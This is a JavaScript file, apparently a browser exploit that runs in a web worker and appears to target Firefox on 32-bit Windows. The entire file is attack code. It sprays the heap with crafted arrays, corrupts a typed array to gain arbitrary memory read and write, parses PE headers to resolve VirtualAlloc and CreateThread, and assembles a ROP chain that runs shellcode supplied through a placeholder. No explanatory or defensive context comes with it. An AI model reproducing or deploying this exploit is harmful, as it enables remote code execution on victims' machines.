362 lines
12 KiB
JavaScript
362 lines
12 KiB
JavaScript
var window = self;
|
|
|
|
function Memory(b,a,f)
|
|
{
|
|
this._base_addr=b;
|
|
this._read=a;
|
|
this._write=f;
|
|
this._abs_read = function(a) {
|
|
a >= this._base_addr ? a = this._read( a - this._base_addr) : ( a = 4294967295 - this._base_addr + 1 + a, a = this._read(a) );
|
|
return 0>a?4294967295+a+1:a
|
|
|
|
};
|
|
this._abs_write = function(a,b) {
|
|
a >= this._base_addr ? this._write(a - this._base_addr, b) : ( a = 4294967295 - this._base_addr + 1 + a, this._write(a,b) )
|
|
};
|
|
this.readByte = function(a) {
|
|
return this.read(a) & 255
|
|
|
|
};
|
|
this.readWord = function(a) {
|
|
return this.read(a) & 65535
|
|
};
|
|
this.readDword = function(a){ return this.read(a) };
|
|
this.read = function(a,b) {
|
|
if (a%4) {
|
|
var c = this._abs_read( a & 4294967292),
|
|
d = this._abs_read( a+4 & 4294967292),
|
|
e = a%4;
|
|
return c>>>8*e | d<<8*(4-e)
|
|
}
|
|
return this._abs_read(a)
|
|
};
|
|
this.readStr = function(a) {
|
|
for(var b = "", c = 0;;) {
|
|
if (32 == c)
|
|
return "";
|
|
var d = this.readByte(a+c);
|
|
if(0 == d)
|
|
break;
|
|
b += String.fromCharCode(d);
|
|
c++
|
|
}
|
|
return b
|
|
|
|
};
|
|
this.write = function(a){}
|
|
}
|
|
|
|
function PE(b,a) {
|
|
this.mem = b;
|
|
this.export_table = this.module_base = void 0;
|
|
this.export_table_size = 0;
|
|
this.import_table = void 0;
|
|
this.import_table_size = 0;
|
|
this.find_module_base = function(a) {
|
|
for(a &= 4294901760; a; ) {
|
|
if(0x5a4d == this.mem.readWord(a))
|
|
return this.module_base=a;
|
|
a -= 65536
|
|
}
|
|
};
|
|
this._resolve_pe_structures = function() {
|
|
peFile = this.module_base + this.mem.readWord(this.module_base+60);
|
|
if(0x4550 != this.mem.readDword(peFile))
|
|
throw "Bad NT Signature";
|
|
|
|
this.pe_file = peFile;
|
|
this.optional_header = this.pe_file+36;
|
|
this.export_directory = this.module_base+this.mem.readDword(this.pe_file+120);
|
|
this.export_directory_size = this.mem.readDword(this.pe_file+124);
|
|
this.import_directory=this.module_base+this.mem.readDword(this.pe_file+128);
|
|
this.import_directory_size=this.mem.readDword(this.pe_file+132)};
|
|
this.resolve_imported_function=function(a,b){
|
|
void 0==this.import_directory&&this._resolve_pe_structures();
|
|
for(var e=this.import_directory,c=e+this.import_directory_size;e<c;){
|
|
var d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base);
|
|
if(a.toUpperCase()==d.toUpperCase()){
|
|
for(var c = this.mem.readDword(e) + this.module_base,
|
|
e = this.mem.readDword(e+16) + this.module_base,
|
|
d = this.mem.readDword(c),
|
|
f = 0 ; 0 !=d ; )
|
|
{
|
|
if(this.mem.readStr(d+this.module_base+2).toUpperCase() == b.toUpperCase())
|
|
return this.mem.readDword(e+4*f);
|
|
f++;
|
|
d = this.mem.readDword(c+4*f)
|
|
}
|
|
break
|
|
}
|
|
e+=20
|
|
}
|
|
return 0
|
|
};
|
|
void 0!=a && this.find_module_base(a)
|
|
}
|
|
|
|
function ROP(mem,a){
|
|
this.mem = mem;
|
|
this.pe = new PE(mem,a);
|
|
this.pe._resolve_pe_structures();
|
|
this.module_base = this.pe.module_base + 0x1000;
|
|
|
|
this.findSequence = function(seq) {
|
|
for(var b=0;;) {
|
|
for(var e=0,c=0;c<seq.length;c++)
|
|
if(this.mem.readByte(this.module_base+b+c)==seq[c]&&e==c)
|
|
e++;
|
|
else
|
|
break;
|
|
if(e==seq.length)
|
|
return this.module_base+b;
|
|
b++
|
|
|
|
}
|
|
|
|
};
|
|
this.findStackPivot=function() {
|
|
return this.findSequence([0x94, 0xc3])
|
|
|
|
};
|
|
this.findPopRet=function(a) {
|
|
return this.findSequence([0x58, 0xc3])
|
|
|
|
};
|
|
this.ropChain=function(base, vtOffset, array = undefined) {
|
|
var buf = undefined
|
|
if (array != undefined)
|
|
buf = array
|
|
else
|
|
buf = new ArrayBuffer(0x1000)
|
|
ropBuff = new Uint32Array(buf);
|
|
var stackPivot = this.findStackPivot(),
|
|
popRet = this.findPopRet("EAX"),
|
|
virtualAllocAddr = this.pe.resolve_imported_function("kernel32.dll","VirtualAlloc");
|
|
|
|
ropBuff[0]= popRet+1;
|
|
ropBuff[1]= popRet;
|
|
ropBuff[2]= base+vtOffset+4;
|
|
ropBuff[3]= stackPivot;
|
|
ropBuff[vtOffset>>2] = stackPivot;
|
|
|
|
offset = (vtOffset+4>>2);
|
|
ropBuff[offset++]=virtualAllocAddr;
|
|
ropBuff[offset++]=base+(vtOffset+0x1c);
|
|
ropBuff[offset++]=base;
|
|
ropBuff[offset++]=0x1000;
|
|
ropBuff[offset++]=0x1000;
|
|
ropBuff[offset++]=0x40;
|
|
ropBuff[offset++]=0xcccccccc;
|
|
|
|
return ropBuff;
|
|
}
|
|
}
|
|
|
|
var conv=new ArrayBuffer(8)
|
|
var convf64=new Float64Array(conv)
|
|
var convu32=new Uint32Array(conv)
|
|
|
|
var qword2Double=function(b,a) {
|
|
convu32[0]=b;
|
|
convu32[1]=a;
|
|
return convf64[0]
|
|
}
|
|
|
|
var doubleFromFloat = function(b,a) {
|
|
convf64[0]=b;
|
|
return convu32[a]
|
|
}
|
|
|
|
var sprayArrays=function() {
|
|
var mArray = new Array(0x1fffe)
|
|
var arrBuf = new ArrayBuffer(0x100000);
|
|
var dwArray = new Uint32Array(arrBuf)
|
|
var qwArray = new Float64Array(arrBuf, 0x10)
|
|
|
|
|
|
for (var i = 0; i < 0x1fffe; i++)
|
|
mArray[i] = qword2Double(0, 0);
|
|
|
|
mArray[2] = qword2Double(arrBase + 0xaf0, 0)
|
|
mArray[0xe] = qword2Double(arrBase + 0x08, 0)
|
|
mArray[0x15] = qword2Double(0, 0x02)
|
|
mArray[0x21] = qword2Double(0x02, 0)
|
|
mArray[0x22] = qword2Double(arrBase + 0x2f0, arrBase + 0x1f0)
|
|
mArray[0x3e] = qword2Double(0, arrBase + 0x3f0)
|
|
mArray[0x5e] = qword2Double(arrBase + 0x4f0, 0)
|
|
mArray[0x80] = qword2Double(0x02, 0)
|
|
mArray[0x9f] = qword2Double(arrBase + 0x500,0)
|
|
mArray[0xa0] = qword2Double(0, 0xf0000000)
|
|
mArray[0xa2] = qword2Double(0, 0xbff00000)
|
|
mArray[0xa4] = qword2Double(0x02, 0)
|
|
mArray[0xa5] = qword2Double(0x01, 0)
|
|
mArray[0xaa] = qword2Double(0, arrBase + 0x5f0)
|
|
mArray[0xac] = qword2Double(arrBase + 0x6f0, arrBase + 0x700)
|
|
mArray[0xb3] = qword2Double(0, 0x02)
|
|
mArray[0xb4] = qword2Double(0, 0)
|
|
mArray[0xde] = qword2Double(arrBase + 0x7f0, 0)
|
|
mArray[0xfe] = qword2Double(0x01, 0);
|
|
mArray[0xff] = qword2Double(0, 0x10000000)
|
|
mArray[0x15e] = qword2Double(0x07, 0)
|
|
mArray[0x15f] = qword2Double(arrBase + 0xf0, arrBase - 0x10 + 0x05)
|
|
mArray[0x160] = qword2Double(arrBase - 0x07, arrBase - 0x10 + 0x0d)
|
|
mArray[0x161] = qword2Double(arrBase + 0x10000b, arrBase + 0x100007)
|
|
mArray[0x162] = qword2Double(arrBase + 0x100003, 0)
|
|
mArray[0x202] = qword2Double(arrBase + 0x1af0, 0)
|
|
mArray[0x20e] = qword2Double(arrBase + 0x1008, 0)
|
|
mArray[0x215] = qword2Double(0, 0x02)
|
|
mArray[0x221] = qword2Double(0x02, 0)
|
|
mArray[0x222] = qword2Double(arrBase + 0x12f0, arrBase + 0x11f0)
|
|
mArray[0x23e] = qword2Double(0, arrBase + 0x13f0)
|
|
mArray[0x25e] = qword2Double(arrBase + 0x14f0, 0)
|
|
mArray[0x280] = qword2Double(0x02, 0)
|
|
mArray[0x29f] = qword2Double(arrBase + 0x1500,0)
|
|
mArray[0x2a0] = qword2Double(0, 0xf0000000)
|
|
mArray[0x2a2] = qword2Double(0, 0xbff00000)
|
|
mArray[0x2a4] = qword2Double(0x02, 0)
|
|
mArray[0x2a5] = qword2Double(0x01, 0)
|
|
mArray[0x2aa] = qword2Double(0, arrBase + 0x15f0)
|
|
mArray[0x2ac] = qword2Double(arrBase + 0x16f0, arrBase + 0x1700)
|
|
mArray[0x2b3] = qword2Double(0, 0x02)
|
|
mArray[0x2b4] = qword2Double(0, 0x00)
|
|
mArray[0x2de] = qword2Double(arrBase + 0x17f0, 0)
|
|
mArray[0x2fe] = qword2Double(0x01, 0)
|
|
mArray[0x2ff] = qword2Double(0, 0x10000000)
|
|
|
|
var i = mArray.length;
|
|
while(i--) {qwArray[i] = mArray[i];}
|
|
|
|
for (var i = 0; i < spr.length; i += 2)
|
|
{
|
|
spr[i] = mArray.slice(0)
|
|
spr[i + 1] = arrBuf.slice(0)
|
|
}
|
|
}
|
|
|
|
var spr = new Array(400)
|
|
var arrBase = 0x22100010;
|
|
|
|
// insert codes here \/ ------
|
|
Shellcode = unescape("INSERTSHELLCODEHEREPLZ");
|
|
|
|
if (Shellcode.length % 2 != 0)
|
|
Shellcode += "NOPSGOHERE";
|
|
|
|
sprayArrays();
|
|
postMessage(arrBase)
|
|
|
|
|
|
var len = spr[0].length;
|
|
var mArray = undefined;
|
|
var dwArray = undefined;
|
|
var qwArray = undefined;
|
|
var container = undefined;
|
|
|
|
while (mArray == undefined)
|
|
{
|
|
for (var i = 0; i < spr.length; i += 2)
|
|
{
|
|
if (spr[i].length != len)
|
|
{
|
|
container = dwArray = new Uint32Array(spr[i + 1])
|
|
qwArray = new Float64Array(spr[i + 1], 0x10)
|
|
if (dwArray[1] == 0)
|
|
{
|
|
dwArray = new Uint32Array(spr[i - 1])
|
|
dwArray[0] = dwArray[1] = dwArray[2] = dwArray[3] = 0xdea110c8;
|
|
qwArray = new Float64Array(spr[i - 1], 0x10)
|
|
}
|
|
mArray = spr[i];
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
|
|
var off = 0x100000;
|
|
if (dwArray != container)
|
|
off = off * 2;
|
|
|
|
var memory = new Uint32Array(0x10);
|
|
var len = memory.length;
|
|
mArray[0x20000] = memory;
|
|
ropArrBuf = new ArrayBuffer(0x1000)
|
|
mArray[0x20001] = ropArrBuf;
|
|
ropArrBufPtr = container[0x6]
|
|
|
|
targetAddr = container[4] + 0x1b;
|
|
var arrayBase = container[4] + 0x30;
|
|
|
|
mArray[0x20000] = undefined;
|
|
mArray[0x20001] = undefined;
|
|
|
|
var n = 0x40;
|
|
qwArray[0x35e] = mArray[0x35e] = qword2Double(n + 1, 0)
|
|
qwArray[0x35f] = mArray[0x35f] = qword2Double(arrBase - 0x10 + 0x1100, targetAddr)
|
|
for (var i = 0; i < (n/2); i++)
|
|
qwArray[0x360 + i] = mArray[0x360 + i] = qword2Double(targetAddr, targetAddr)
|
|
|
|
container[0] = container[1] = container[2] = container[3] = 0xffffff81;
|
|
qwArray[0x1e] = mArray[0x1e] = qword2Double(0xdea110c8, 0)
|
|
qwArray[0xfe] = mArray[0xfe] = qword2Double(2, 0)
|
|
qwArray[0xb3] = mArray[0xb3] = qword2Double(0, 3)
|
|
qwArray[0xa9] = mArray[0xa9] = qword2Double(0, 2)
|
|
|
|
while (memory.length == len) {}
|
|
|
|
|
|
var mem = new Memory(arrayBase,
|
|
function(b) { return memory[b/4]; },
|
|
function(b,a) { memory[b/4] = a; });
|
|
|
|
var ptr = targetAddr - 0x1b;
|
|
var xulPtr = mem.readDword(ptr + 0xc);
|
|
var rop = new ROP(mem, xulPtr);
|
|
var ropBase = mem.readDword(ropArrBufPtr + 0x10);
|
|
rop.ropChain(ropBase, 0x130, ropArrBuf);
|
|
var backupESP = rop.findSequence(Array(0x89, 0x01, 0xc3))
|
|
var ropChain = new Uint32Array(ropArrBuf)
|
|
ropChain[0] = backupESP;
|
|
CreateThread = rop.pe.resolve_imported_function('KERNEL32.dll', 'CreateThread')
|
|
|
|
ropChain[0x12c >> 2] = ropChain[0x130 >> 2];
|
|
|
|
for (var i = 0; i < ropChain.length; i++)
|
|
{
|
|
if (ropChain[i] == 0xcccccccc)
|
|
break;
|
|
}
|
|
|
|
ropChain[i++] = 0xc4819090;
|
|
ropChain[i++] = 0x00000800;
|
|
ropChain[i++] = 0x5050c031;
|
|
ropChain[i++] = 0x5b21eb50;
|
|
ropChain[i++] = 0xb8505053;
|
|
ropChain[i++] = CreateThread;
|
|
ropChain[i++] = 0xb890d0ff;
|
|
ropChain[i++] = arrBase + 0x2040;
|
|
ropChain[i++] = 0x5f58208b;
|
|
ropChain[i++] = 0xbe905d58;
|
|
ropChain[i++] = 0xFFFFFF00;
|
|
ropChain[i++] = 0x000cc2c9;
|
|
ropChain[i++] = 0xffffdae8;
|
|
ropChain[i++] = 0x909090ff;
|
|
|
|
for (var j = 0; j < Shellcode.length; j += 2)
|
|
ropChain[i++] = Shellcode.charCodeAt(j) + Shellcode.charCodeAt(j + 1) * 0x10000;
|
|
|
|
mArray[0x400] = qwArray[0x400] = qword2Double(arrBase + 0x2000, 0)
|
|
mArray[0x400 + (0x10 >> 3)] = qwArray[0x400 + (0x10 >> 3)] = qword2Double(0, arrBase + 0x2040)
|
|
mArray[0x400 + (0x18 >> 3)] = qwArray[0x400 + (0x18 >> 3)] = qword2Double(4, 0)
|
|
mArray[0x400 + (0x40 >> 3)] = qwArray[0x400 + (0x40 >> 3)] = qword2Double(ropBase, 0)
|
|
mArray[0x400 + (0xac >> 3)] = qwArray[0x400 + (0xac >> 3)] = qword2Double(0, 2)
|
|
|
|
for (var i = 0; i < 4; i++) {
|
|
container[0x400 + i] = 0xdea110c8
|
|
}
|
|
|
|
qwArray[0x21e] = mArray[0x21e] = qword2Double(0xdea110c8, 0)
|
|
qwArray[0x2fe] = mArray[0x2fe] = qword2Double(2, 0)
|
|
qwArray[0x2b3] = mArray[0x2b3] = qword2Double(0, 3)
|
|
qwArray[0x2a9] = mArray[0x2a9] = qword2Double(0, 2)
|
|
|
|
postMessage("!") |